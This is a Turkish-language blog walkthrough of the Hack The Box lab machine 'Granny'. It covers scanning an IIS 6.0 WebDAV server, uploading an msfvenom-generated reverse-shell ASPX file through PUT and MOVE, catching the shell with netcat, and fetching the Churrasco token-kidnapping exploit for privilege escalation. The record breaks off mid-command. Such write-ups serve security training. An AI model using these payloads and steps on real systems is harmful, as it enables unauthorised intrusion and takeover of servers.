{"id":1439,"date":"2021-07-30T13:11:12","date_gmt":"2021-07-30T13:11:12","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1439"},"modified":"2022-06-11T09:19:18","modified_gmt":"2022-06-11T09:19:18","slug":"granny","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/30\/granny\/","title":{"rendered":"Granny"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/14\" title=\"Granny\">Granny<\/a> - HTB<\/td>\n<td>Kolay<\/td>\n<td>Windows<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/e8a122e2d713a4fb4a180bb9ccd20248.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>Nmap taramas\u0131 ile ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">Starting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-30 04:19 EDT\nNmap scan report for 10.10.10.15\nHost is up (0.073s latency).\nNot shown: 65534 filtered ports\nPORT   STATE SERVICE VERSION\n80\/tcp open  http    Microsoft IIS httpd 6.0\n| http-methods: \n|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT\n|_http-server-header: Microsoft-IIS\/6.0\n|_http-title: Under Construction\n| http-webdav-scan: \n|   WebDAV type: Unknown\n|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK\n|   Server Date: Fri, 30 Jul 2021 08:21:29 GMT\n|   Server Type: Microsoft-IIS\/6.0\n|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)\nOS CPE: cpe:\/o:microsoft:windows_server_2003::sp1 cpe:\/o:microsoft:windows_server_2003::sp2 cpe:\/o:microsoft:windows_server_2008::sp2 cpe:\/o:microsoft:windows_xp::sp3 cpe:\/o:microsoft:windows_2000::sp4\nAggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (88%), Microsoft Windows XP (87%), Microsoft Windows 2000 SP4 (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows XP SP2 or SP3 (85%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nTRACEROUTE (using port 80\/tcp)\nHOP RTT      ADDRESS\n1   72.94 ms 10.10.14.1\n2   73.19 ms 10.10.10.15\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 104.32 seconds\n<\/code><\/pre>\n<p>Nikto \u00e7\u0131kt\u0131s\u0131nda put metodu dikkatimi \u00e7ekti.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# nikto -h http:\/\/10.10.10.15\/    \n- Nikto v2.1.6\n---------------------------------------------------------------------------\n+ Target IP:          10.10.10.15\n+ Target Hostname:    10.10.10.15\n+ Target Port:        80\n+ Start Time:         2021-07-30 02:32:59 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Microsoft-IIS\/6.0\n+ Retrieved microsoftofficewebserver header: 5.0_Pub\n+ Retrieved x-powered-by header: ASP.NET\n+ The anti-clickjacking X-Frame-Options header is not present.\n+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\n+ Uncommon header &#039;microsoftofficewebserver&#039; found, with contents: 5.0_Pub\n+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type\n+ Retrieved x-aspnet-version header: 1.1.4322\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ OSVDB-397: HTTP method &#039;PUT&#039; allows clients to save files on the web server.\n+ OSVDB-5646: HTTP method &#039;DELETE&#039; allows clients to delete files on the web server.\n+ Retrieved dasl header: &lt;DAV:sql&gt;\n+ Retrieved dav header: 1, 2\n+ Retrieved ms-author-via header: MS-FP\/4.0,DAV\n+ Uncommon header &#039;ms-author-via&#039; found, with contents: MS-FP\/4.0,DAV\n+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH \n+ OSVDB-5646: HTTP method (&#039;Allow&#039; Header): &#039;DELETE&#039; may allow clients to remove files on the web server.\n+ OSVDB-397: HTTP method (&#039;Allow&#039; Header): &#039;PUT&#039; method could allow clients to save files on the web server.\n+ OSVDB-5647: HTTP method (&#039;Allow&#039; Header): &#039;MOVE&#039; may allow clients to change file locations on the web server.\n+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH \n+ OSVDB-5646: HTTP method (&#039;Public&#039; Header): &#039;DELETE&#039; may allow clients to remove files on the web server.\n+ OSVDB-397: HTTP method (&#039;Public&#039; Header): &#039;PUT&#039; method could allow clients to save files on the web server.\n+ OSVDB-5647: HTTP method (&#039;Public&#039; Header): &#039;MOVE&#039; may allow clients to change file locations on the web server.\n+ WebDAV enabled (PROPFIND COPY LOCK MKCOL UNLOCK SEARCH PROPPATCH listed as allowed)\n+ OSVDB-13431: PROPFIND HTTP verb may show the server&#039;s internal IP address: http:\/\/granny\/_vti_bin\/_vti_aut\/author.dll\n+ OSVDB-396: \/_vti_bin\/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe\/aux.htm -- a DoS was not attempted.\n+ OSVDB-3233: \/postinfo.html: Microsoft FrontPage default file found.\n+ OSVDB-3233: \/_private\/: FrontPage directory found.\n+ OSVDB-3233: \/_vti_bin\/: FrontPage directory found.\n+ OSVDB-3233: \/_vti_inf.html: FrontPage\/SharePoint is installed and reveals its version number (check HTML source for more information).\n+ OSVDB-3300: \/_vti_bin\/: shtml.exe\/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).\n+ OSVDB-3500: \/_vti_bin\/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-1999-1376. http:\/\/www.securityfocus.com\/bid\/2252.\n+ OSVDB-67: \/_vti_bin\/shtml.dll\/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.\n+ \/_vti_bin\/_vti_adm\/admin.dll: FrontPage\/SharePoint file found.\n+ 8018 requests: 0 error(s) and 32 item(s) reported on remote host\n+ End Time:           2021-07-30 02:43:54 (GMT-4) (655 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<p>Sayfada bir \u015fey bulamad\u0131m bunun \u00fczerine put metodu ile manip\u00fcle etmeyhe karar verdim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Grany]\n\u2514\u2500# davtest  --url http:\/\/10.10.10.15\/         \n********************************************************\n Testing DAV connection\nOPEN        SUCCEED:        http:\/\/10.10.10.15\n********************************************************\nNOTE    Random string for this session: qKAag__9esog\n********************************************************\n Creating directory\nMKCOL       SUCCEED:        Created http:\/\/10.10.10.15\/DavTestDir_qKAag__9esog\n********************************************************\n Sending test files\nPUT cfm SUCCEED:    http:\/\/10.10.10.15\/DavTestDir_qKAag__9esog\/davtest_qKAag__9esog.cfm\nPUT asp FAIL\nPUT php SUCCEED:    http:\/\/10.10.10.15\/DavTestDir_qKAag__9esog\/davtest_qKAag__9esog.php\nPUT txt SUCCEED:    http:\/\/10.10.10.15\/DavTestDir_qKAag__9esog\/davtest_qKAag__9esog.txt\nPUT aspx    FAIL\nPUT html    SUCCEED:    http:\/\/10.10.10.15\/DavTestDir_qKAag__9esog\/davtest_qKAag__9esog.html\nPUT jhtml   SUCCEED:    http:\/\/10.10.10.15\/DavTestDir_qKAag__9esog\/davtest_qKAag__9esog.jhtml\nPUT shtml   FAIL\nPUT jsp SUCCEED:    http:\/\/10.10.10.15\/DavTestDir_qKAag__9esog\/davtest_qKAag__9esog.jsp\nPUT cgi FAIL\nPUT pl  SUCCEED:    http:\/\/10.10.10.15\/DavTestDir_qKAag__9esog\/davtest_qKAag__9esog.pl\n********************************************************\n Checking for test file execution\nEXEC    cfm FAIL\nEXEC    txt SUCCEED:    http:\/\/10.10.10.15\/DavTestDir_qKAag__9esog\/davtest_qKAag__9esog.txt\nEXEC    html    SUCCEED:    http:\/\/10.10.10.15\/DavTestDir_qKAag__9esog\/davtest_qKAag__9esog.html\nEXEC    jhtml   FAIL\nEXEC    jsp FAIL\nEXEC    pl  FAIL<\/code><\/pre>\n<p>Ayn\u0131 zamanda MOVE komutunuda destekledi\u011fi i\u00e7in server. txt olarak g\u00f6nderip daha sonras\u0131nda aspx olarak de\u011fi\u015ftirece\u011fim. Hemen bir webshell \u00fcretelim.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Grany]\n\u2514\u2500# msfvenom -p windows\/shell_reverse_tcp LHOST=10.10.14.13 LPORT=4444 -f aspx &gt; shell.aspx\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 324 bytes\nFinal size of aspx file: 2703 bytes<\/code><\/pre>\n<p>\u015eimdi bunu txt yapal\u0131m ve put ile yollayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Grany]\n\u2514\u2500# mv shell.aspx shell.txt                                                                        \n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Grany]\n\u2514\u2500# cadaver http:\/\/10.10.10.15\/                                                                    \n^CTerminated by signal 2.\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Grany]\n\u2514\u2500# cadaver http:\/\/10.10.10.15\/                                                                                                                                                                                                         255 \u2a2f\ndav:\/&gt; put shell.txt \nUploading shell.txt to `\/shell.txt&#039;:\nProgress: [=============================&gt;] 100.0% of 2703 bytes succeeded.\ndav:\/&gt; exit\nConnection to `10.10.10.15&#039; closed.<\/code><\/pre>\n<p>Harika! \u015eimdi dosyan\u0131n uzant\u0131s\u0131n\u0131 de\u011fi\u015ftirelim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Grany]\n\u2514\u2500# curl -X MOVE --header &quot;Destination:http:\/\/10.10.10.15\/shell.aspx&quot; http:\/\/10.10.10.15\/shell.txt \n<\/code><\/pre>\n<p>Dinleme noktam\u0131z\u0131 a\u00e7al\u0131m ve reverse alal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Grany]\n\u2514\u2500# nc -lvp 4444\nlistening on [any] 4444 ...\n10.10.10.15: inverse host lookup failed: Unknown host\nconnect to [10.10.14.13] from (UNKNOWN) [10.10.10.15] 1034\nMicrosoft Windows [Version 5.2.3790]\n(C) Copyright 1985-2003 Microsoft Corp.\n\nc:\\windows\\system32\\inetsrv&gt;<\/code><\/pre>\n<p>\u0130lk i\u015fim tabikide systeminfo almak olacak daha sonra zafiyetleri tespit edip hak y\u00fckseltmeyhi deneyece\u011fim.<\/p>\n<pre><code class=\"language-sh\">c:\\windows\\system32\\inetsrv&gt;cmd.exe \/c systeminfo\ncmd.exe \/c systeminfo\n\nHost Name:                 GRANNY\nOS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition\nOS Version:                5.2.3790 Service Pack 2 Build 3790\nOS Manufacturer:           Microsoft Corporation\nOS Configuration:          Standalone Server\nOS Build Type:             Uniprocessor Free\nRegistered Owner:          HTB\nRegistered Organization:   HTB\nProduct ID:                69712-296-0024942-44782\nOriginal Install Date:     4\/12\/2017, 5:07:40 PM\nSystem Up Time:            0 Days, 5 Hours, 4 Minutes, 19 Seconds\nSystem Manufacturer:       VMware, Inc.\nSystem Model:              VMware Virtual Platform\nSystem Type:               X86-based PC\nProcessor(s):              1 Processor(s) Installed.\n                           [01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~1999 Mhz\nBIOS Version:              INTEL  - 6040000\nWindows Directory:         C:\\WINDOWS\nSystem Directory:          C:\\WINDOWS\\system32\nBoot Device:               \\Device\\HarddiskVolume1\nSystem Locale:             en-us;English (United States)\nInput Locale:              en-us;English (United States)\nTime Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk\nTotal Physical Memory:     1,023 MB\nAvailable Physical Memory: 753 MB\nPage File: Max Size:       2,470 MB\nPage File: Available:      2,279 MB\nPage File: In Use:         191 MB\nPage File Location(s):     C:\\pagefile.sys\nDomain:                    HTB\nLogon Server:              N\/A\nHotfix(s):                 1 Hotfix(s) Installed.\n                           [01]: Q147222\nNetwork Card(s):           1 NIC(s) Installed.\n                           [01]: Intel(R) PRO\/1000 MT Network Connection\n                                 Connection Name: Local Area Connection\n                                 DHCP Enabled:    No\n                                 IP address(es)\n                                 [01]: 10.10.10.15\n<\/code><\/pre>\n<p>Windows-Exploit-Suggester \u00e7\u0131kt\u0131s\u0131 a\u015fa\u011f\u0131da:<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Grany]\n\u2514\u2500# python2 \/root\/tool\/Windows-Exploit-Suggester\/windows-exploit-suggester.py -i systeminfo -d \/root\/tool\/Windows-Exploit-Suggester\/2021-07-28-mssb.xls | tee windows-exploit-suggester\n[*] initiating winsploit version 3.3...\n[*] database file detected as xls or xlsx based on extension\n[*] attempting to read from the systeminfo input file\n[+] systeminfo input file read successfully (ascii)\n[*] querying database file for potential vulnerabilities\n[*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits\n[*] there are now 356 remaining vulns\n[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin\n[+] windows version identified as &#039;Windows 2003 SP2 32-bit&#039;\n[*] \n[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important\n[*]   https:\/\/github.com\/hfiref0x\/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/37367\/ -- Windows ClientCopyImage Win32k Exploit, MSF\n[*] \n[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical\n[*]   https:\/\/www.exploit-db.com\/exploits\/39035\/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/37098\/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/39035\/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC\n[*] \n[E] MS14-070: Vulnerability in TCP\/IP Could Allow Elevation of Privilege (2989935) - Important\n[*]   http:\/\/www.exploit-db.com\/exploits\/35936\/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC\n[*] \n[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical\n[*]   http:\/\/www.exploit-db.com\/exploits\/35474\/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC\n[*] \n[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical\n[*]   https:\/\/www.exploit-db.com\/exploits\/37800\/\/ -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC\n[*]   http:\/\/www.exploit-db.com\/exploits\/35308\/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution \/ Powershell VirtualAlloc (MS14-064), PoC\n[*]   http:\/\/www.exploit-db.com\/exploits\/35229\/ -- Internet Explorer &lt;= 11 - OLE Automation Array Remote Code Execution (#1), PoC\n[*]   http:\/\/www.exploit-db.com\/exploits\/35230\/ -- Internet Explorer &lt; 11 - OLE Automation Array Remote Code Execution (MSF), MSF\n[*]   http:\/\/www.exploit-db.com\/exploits\/35235\/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF\n[*]   http:\/\/www.exploit-db.com\/exploits\/35236\/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF\n[*] \n[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important\n[*]   http:\/\/www.exploit-db.com\/exploits\/34112\/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC\n[*]   http:\/\/www.exploit-db.com\/exploits\/34982\/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation\n[*] \n[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical\n[*]   http:\/\/www.exploit-db.com\/exploits\/35101\/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF\n[*] \n[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important\n[*]   https:\/\/www.exploit-db.com\/exploits\/39525\/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/39446\/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC\n[*] \n[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical\n[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical\n[*]   http:\/\/www.exploit-db.com\/exploits\/34458\/\n[*] \n[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important\n[*]   http:\/\/www.exploit-db.com\/exploits\/35280\/, -- .NET Remoting Services Remote Command Execution, PoC\n[*] \n[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical\n[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important\n[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important\n[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important\n[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical\n[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical\n[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical\n[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important\n[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical\n[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical\n[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical\n[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical\n[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical\n[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical\n[*]   http:\/\/www.exploit-db.com\/exploits\/35273\/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP &amp; EMET 5., PoC\n[*]   http:\/\/www.exploit-db.com\/exploits\/34815\/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP &amp; EMET 5.0 Bypass (MS12-037), PoC\n[*] \n[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important\n[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important\n[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important\n[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical\n[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important\n[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical\n[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical\n[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical\n[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important\n[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important\n[M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important\n[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical\n[M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical\n[M] MS08-078: Security Update for Internet Explorer (960714) - Critical\n[*] done<\/code><\/pre>\n<p>Bu \u00e7\u0131kt\u0131y\u0131 priv \u015fekilde d\u00fczenleyelim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Grany]\n\u2514\u2500# cat windows-exploit-suggester | grep Privilege\n[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important\n[*]   https:\/\/github.com\/hfiref0x\/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/39035\/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/37098\/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/39035\/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC\n[E] MS14-070: Vulnerability in TCP\/IP Could Allow Elevation of Privilege (2989935) - Important\n[*]   http:\/\/www.exploit-db.com\/exploits\/35936\/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC\n[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical\n[*]   http:\/\/www.exploit-db.com\/exploits\/35474\/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC\n[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important\n[*]   http:\/\/www.exploit-db.com\/exploits\/34112\/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC\n[*]   http:\/\/www.exploit-db.com\/exploits\/34982\/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation\n[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important\n[*]   https:\/\/www.exploit-db.com\/exploits\/39525\/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/39446\/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC\n[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important\n[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important\n[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important\n[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important\n[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important\n[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important\n[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important\n[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important\n[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important<\/code><\/pre>\n<p>Evet burdaki b\u00fct\u00fcn erxploitleri denedim ancak olmad\u0131! Bunun \u00fczerine internetten ara\u015ft\u0131rmaya ba\u015flad\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Grany]\n\u2514\u2500# searchsploit Microsoft Windows Server 2003 Privilege\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\n Exploit Title                                                                                                                                                                                              |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nMicrosoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (1)                                                                                                                          | windows\/local\/22882.c\nMicrosoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (2)                                                                                                                          | windows\/local\/22883.c\nMicrosoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation                                                                                                                                 | windows\/local\/6705.txt\nMicrosoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)                                                                                                                                   | windows\/local\/35936.py\nMicrosoft Windows Server 2003 SP2 - TCP\/IP IOCTL Privilege Escalation (MS14-070)                                                                                                                            | windows\/local\/37755.c\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nShellcodes: No Results\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Grany]\n\u2514\u2500# searchsploit -m windows\/local\/6705.txt              \n  Exploit: Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation\n      URL: https:\/\/www.exploit-db.com\/exploits\/6705\n     Path: \/usr\/share\/exploitdb\/exploits\/windows\/local\/6705.txt\nFile Type: ASCII text, with CRLF line terminators\n\nCopied to: \/root\/oscp\/htb\/Grany\/6705.txt<\/code><\/pre>\n<p>Exploiti okudu\u011fda binary olabilecek bir linkin \u00f6l\u00fc oldu\u011funu g\u00f6rd\u00fcm. Bunun \u011f\u00fczerine internette &quot;Churrasco exe&quot; \u015feklinde arama yapt\u0131m ve <strong><a href=\"https:\/\/github.com\/Re4son\/Churrasco\/raw\/master\/churrasco.exe\">https:\/\/github.com\/Re4son\/Churrasco\/raw\/master\/churrasco.exe<\/a>    <\/strong> adresini buldum.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Grany]\n\u2514\u2500# wget https:\/\/github.com\/Re4son\/Churrasco\/raw\/master\/churrasco.exe                                                                                                                                                                     8 \u2a2f\n\n--2021-07-30 08:57:00--  https:\/\/github.com\/Re4son\/Churrasco\/raw\/master\/churrasco.exe\nResolving github.com (github.com)... 140.82.121.3\nConnecting to github.com (github.com)|140.82.121.3|:443... connected.\nHTTP request sent, awaiting response... 302 Found\nLocation: https:\/\/raw.githubusercontent.com\/Re4son\/Churrasco\/master\/churrasco.exe [following]\n--2021-07-30 08:57:01--  https:\/\/raw.githubusercontent.com\/Re4son\/Churrasco\/master\/churrasco.exe\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 31232 (30K) [application\/octet-stream]\nSaving to: \u2018churrasco.exe\u2019\n\nchurrasco.exe                                               100%[=========================================================================================================================================&gt;]  30.50K  --.-KB\/s    in 0.01s   \n\n2021-07-30 08:57:01 (2.03 MB\/s) - \u2018churrasco.exe\u2019 saved [31232\/31232]\n<\/code><\/pre>\n<p>\u015eimdi bu exeyi kar\u015f\u0131ya g\u00f6nderelim.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Grany]\n\u2514\u2500# \/usr\/local\/bin\/smbserver.py KUDAY .                                                                                                                                                                                                 130 \u2a2f\nImpacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation\n\n[*] Config file parsed\n[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0\n[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0\n[*] Config file parsed\n[*] Config file parsed\n[*] Config file parsed\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\nc:\\windows\\system32\\inetsrv&gt;cd C:\\Windows\\Temp\ncd C:\\Windows\\Temp\n\nC:\\WINDOWS\\Temp&gt;whoami\nwhoami\nnt authority\\network service\n\nC:\\WINDOWS\\Temp&gt;copy \\\\10.10.14.13\\KUDAY\\churrasco.exe .\ncopy \\\\10.10.14.13\\KUDAY\\churrasco.exe .\n        1 file(s) copied.\n\nC:\\WINDOWS\\Temp&gt;churrasco.exe\nchurrasco.exe\n\/churrasco\/--&gt;Usage: Churrasco.exe [-d] &quot;command to 